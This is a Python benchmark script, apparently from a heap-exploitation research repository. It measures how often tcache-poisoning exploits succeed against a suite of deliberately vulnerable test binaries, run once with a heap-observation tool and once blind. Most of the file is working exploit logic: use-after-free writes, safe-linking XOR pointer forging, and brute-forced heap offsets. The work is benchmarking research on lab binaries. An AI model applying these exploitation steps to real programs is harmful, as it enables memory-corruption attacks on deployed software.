heap-trm / bench /same_session_benchmark.py
amarck's picture
Defensible benchmark: heaptrm 65% vs blind 32% same-session
e1fab24
#!/usr/bin/env python3
"""
same_session_benchmark.py β€” The correct benchmark.
Both approaches run in the SAME process session:
A: heaptrm session β€” observe addresses, compute exploit, execute in same session
B: blind session β€” same binary, same protocol, but no heap observation
This tests: does structured heap observation enable exploitation that's
otherwise impossible? No LLM needed β€” the exploit logic is deterministic
given the addresses. The question is purely: can we GET the addresses?
"""
import subprocess
import json
import struct
import os
from pathlib import Path
from collections import defaultdict
ROOT = Path(__file__).parent.parent
SUITE = ROOT / "cve_tests" / "suite"
HEAPTRM = str(ROOT / "heaptrm-cli" / "target" / "release" / "heaptrm")
TRIALS = 10
def heaptrm_session(binary: str, sc: int) -> bool:
"""Single heaptrm session: observe + exploit in same process."""
proc = subprocess.Popen(
[HEAPTRM, binary],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL,
text=True
)
def cmd(action, data=""):
proc.stdin.write(json.dumps({"action": action, "data": data}) + "\n")
proc.stdin.flush()
line = proc.stdout.readline()
return json.loads(line) if line.strip() else {}
try:
# Setup: alloc 3, free 2
cmd("send", f"1 0 {sc}\n")
cmd("send", f"1 1 {sc}\n")
cmd("send", f"1 2 {sc}\n")
cmd("send", "4 0\n")
cmd("send", "4 1\n")
# OBSERVE β€” this is what heaptrm provides
r = cmd("observe")
if not r.get("heap"):
cmd("quit"); return False
chunks = r["heap"]["chunks"]
freed = sorted([c for c in chunks if c["state"] == "freed"],
key=lambda c: int(c["address"], 16))
allocated = sorted([c for c in chunks if c["state"] == "allocated"],
key=lambda c: int(c["address"], 16))
if len(freed) < 2 or not allocated:
cmd("quit"); return False
# COMPUTE β€” deterministic given addresses
chunk1_addr = int(freed[-1]["address"], 16)
target_addr = int(allocated[-1]["address"], 16)
xor_key = chunk1_addr >> 12
poisoned = target_addr ^ xor_key
fd_hex = struct.pack("<Q", poisoned).hex()[:16]
# EXPLOIT β€” in same session
cmd("send", f"2 1 {fd_hex}\n")
cmd("send", f"1 3 {sc}\n")
cmd("send", f"1 4 {sc}\n")
cmd("send", "2 4 50574e454421210a\n")
r = cmd("send", "3 2\n")
cmd("quit")
return r.get("output", "").find("50574e4544") >= 0
except Exception:
pass
finally:
try: proc.kill(); proc.wait(timeout=2)
except: pass
return False
def blind_session(binary: str, sc: int, config: dict) -> bool:
"""Same process, but no heap observation. Uses only binary output."""
from pwn import process as pwn_process, p64, context
context.log_level = "error"
p = pwn_process(binary)
try:
def do(cmd):
p.sendline(cmd.encode())
return p.recvline(timeout=1).strip()
r0 = do(f"1 0 {sc}")
r1 = do(f"1 1 {sc}")
r2 = do(f"1 2 {sc}")
do("4 0")
do("4 1")
# Try to extract info from binary output
addr0 = addr1 = addr2 = None
leaked_fd = None
# Check for address leaks in alloc output
for r, name in [(r0, "0"), (r1, "1"), (r2, "2")]:
if r and b"0x" in r:
try:
a = int(r.split(b"0x")[1].split()[0], 16)
if name == "0": addr0 = a
elif name == "1": addr1 = a
elif name == "2": addr2 = a
except: pass
# Try UAF read
p.sendline(f"3 1".encode())
leak = p.recvline(timeout=1).strip()
if leak and leak != b"DELETED" and leak != b"ERR" and len(leak) >= 16:
try:
leaked_fd = int(leak[:16], 16)
except: pass
# Compute based on available info
poisoned = None
if addr1 and addr2:
poisoned = addr2 ^ (addr1 >> 12)
elif leaked_fd and not addr1:
# Decrypt fd with guessed key
key = 0x555555559
decrypted = leaked_fd ^ key
if 0x555555550000 < decrypted < 0x555555570000:
target = decrypted + 0xa0
poisoned = target ^ key
elif addr0 and not addr1 and not addr2:
# Only first address β€” guess offsets
addr1_guess = addr0 + 0x50
addr2_guess = addr0 + 0xa0
poisoned = addr2_guess ^ (addr1_guess >> 12)
if poisoned is None:
# Pure blind β€” try common offsets
base = 0x555555559000
for off in [0x2a0, 0x300, 0x350, 0x400, 0x450, 0x500, 0x550,
0x600, 0x650, 0x700]:
c1 = base + off + 0x50
tgt = c1 + 0x50
test_poison = tgt ^ (c1 >> 12)
do(f"2 1 {p64(test_poison).hex()[:16]}")
do(f"1 3 {sc}")
do(f"1 4 {sc}")
do("2 4 50574e454421210a")
result = do("3 2")
if b"50574e4544" in result:
p.close()
return True
# Wrong β€” must restart (tcache corrupted)
p.close()
return False
do(f"2 1 {p64(poisoned).hex()[:16]}")
do(f"1 3 {sc}")
do(f"1 4 {sc}")
do("2 4 50574e454421210a")
result = do("3 2")
p.close()
return b"50574e4544" in result
except:
try: p.close()
except: pass
return False
def main():
manifest = json.loads((SUITE / "manifest.json").read_text())
print("=" * 80)
print("SAME-SESSION BENCHMARK: heaptrm vs blind (same process)")
print(f"{len(manifest)} challenges Γ— {TRIALS} trials")
print("=" * 80)
by_diff = defaultdict(lambda: {"ht": 0, "bl": 0, "n": 0})
all_results = []
for config in manifest:
name = config["name"]
binary = str(SUITE / name)
if not Path(binary).exists():
continue
sc = 1
ht = bl = 0
for _ in range(TRIALS):
if heaptrm_session(binary, sc): ht += 1
if blind_session(binary, sc, config): bl += 1
diff = config["difficulty"]
by_diff[diff]["ht"] += ht
by_diff[diff]["bl"] += bl
by_diff[diff]["n"] += TRIALS
delta = ht - bl
marker = ">>>" if delta > TRIALS//2 else ">" if delta > 0 else "==" if delta == 0 else "<"
info = f"leak={config['addr_leak']:7s} uaf={str(config['uaf_read']):5s} noise={config['noise_min']}-{config['noise_max']}"
print(f" {name} [{diff:8s}] ht={ht:2d}/{TRIALS} bl={bl:2d}/{TRIALS} {marker:3s} | {info}")
all_results.append({
"name": name, "difficulty": diff,
"heaptrm": ht, "blind": bl, "trials": TRIALS,
**{k: config[k] for k in ["uaf_read", "addr_leak", "noise_min", "noise_max"]}
})
print("\n" + "=" * 80)
print(f"{'Difficulty':10s} {'heaptrm':>10s} {'blind':>10s} {'delta':>8s}")
for diff in ["easy", "medium", "hard", "extreme"]:
d = by_diff[diff]
if d["n"] == 0: continue
ht_pct = d["ht"] / d["n"] * 100
bl_pct = d["bl"] / d["n"] * 100
print(f"{diff:10s} {ht_pct:9.0f}% {bl_pct:9.0f}% {ht_pct-bl_pct:+7.0f}%")
total_ht = sum(d["ht"] for d in by_diff.values())
total_bl = sum(d["bl"] for d in by_diff.values())
total_n = sum(d["n"] for d in by_diff.values())
print(f"{'OVERALL':10s} {total_ht/total_n*100:9.0f}% {total_bl/total_n*100:9.0f}% {(total_ht-total_bl)/total_n*100:+7.0f}%")
Path("bench").mkdir(exist_ok=True)
with open("bench/same_session_results.json", "w") as f:
json.dump(all_results, f, indent=2)
if __name__ == "__main__":
main()